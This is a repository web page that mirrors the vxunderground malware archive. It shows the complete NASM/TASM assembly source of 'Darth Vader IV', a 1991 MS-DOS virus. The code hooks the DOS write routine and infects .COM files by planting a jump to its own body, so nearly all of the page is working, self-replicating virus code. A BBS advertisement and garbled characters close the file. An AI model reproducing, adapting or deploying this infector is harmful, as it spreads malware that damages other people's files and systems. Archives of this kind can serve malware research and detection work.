ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.darth.asm

152 lines
2.4 KiB
NASM
Raw Normal View History

re-organize push
2022-08-21 09:07:57 +00:00
;******************************************************************************
;* *
;* D A R T H V A D E R IV *
;* *
;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia *
;* All Rights Reserved *
;* *
;* Enchanced by: Lazy Wizard *
;* *
;* Turbo Assembler 2.0 *
;* *
;******************************************************************************
.model tiny
.code
org 100h
Start:
call NextLine
First3:
int 20h
int 3
NextLine:
pop bx
push ax
xor di,di
mov es,di
mov es,es:[2Bh*4+2]
mov cx,1000h
call SearchZero
jc ReturnControl
xchg ax,si
inc si
SearchTable:
dec si
db 26h
lodsw
cmp ax,8B2Eh
jne SearchTable
db 26h
lodsb
cmp al,75h
je ReturnControl
cmp al,9Fh
jne SearchTable
mov si,es:[si]
mov cx,LastByte-Start
lea ax,[di+Handle-Start]
org $-1
xchg ax,es:[si+80h]
sub ax,di
sub ax,cx
mov [bx+OldWrite-Start-2],ax
mov word ptr [bx+NewStart+1-Start-3],di
lea si,[bx-3]
rep movsb
ReturnControl:
pop ax
push ss
pop es
mov di,100h
lea si,[bx+First3-Start-3]
push di
movsw
movsb
ret
SearchZero:
xor ax,ax
inc di
push cx
push di
mov cx,(LastByte-Start-1)/2+1
repe scasw
pop di
pop cx
je FoundPlace
loop SearchZero
stc
FoundPlace:
ret
Handle:
push bp
call NextHandle
NextHandle:
pop bp
push es
push ax
push bx
push cx
push si
push di
test ch,ch
je Do
mov ax,1220h
int 2Fh
mov bl,es:[di]
mov ax,1216h
int 2Fh
cmp es:[di+29h],'MO'
jne Do
cmp word ptr es:[di+15h],0
jne Do
push ds
pop es
mov di,dx
mov ax,[di]
mov [bp+First3-NextHandle],ax
mov al,[di+2]
mov [bp+First3+2-NextHandle],al
call SearchZero
jc Do
push di
NewStart:
mov si,0
mov cx,(LastByte-Start-1)/2
cli
rep
db 36h
movsw
sti
mov di,dx
mov al,0E9h
stosb
pop ax
sub ax,di
dec ax
dec ax
stosw
Do:
pop di
pop si
pop cx
pop bx
pop ax
pop es
pop bp
OldWrite:
jmp start
LastByte label byte
end Start
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue Copy Permalink